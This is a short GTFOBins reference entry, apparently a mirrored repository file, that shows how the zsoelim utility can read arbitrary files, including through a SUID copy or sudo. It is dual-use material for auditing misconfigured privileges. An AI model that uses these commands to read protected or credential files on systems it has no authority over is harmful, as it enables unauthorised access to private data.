1
0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2024-09-16 17:01:38 +02:00
GTFOBins.github.io/_gtfobins/zsoelim.md
2020-03-15 13:33:15 +01:00

17 lines
376 B
Markdown

---
description: The content is actually parsed and corrupted by the command, thus it may not be suitable for arbitrary files.
functions:
file-read:
- code: |
LFILE=file_to_read
zsoelim "$LFILE"
suid:
- code: |
LFILE=file_to_read
./zsoelim "$LFILE"
sudo:
- code: |
LFILE=file_to_read
sudo zsoelim "$LFILE"
---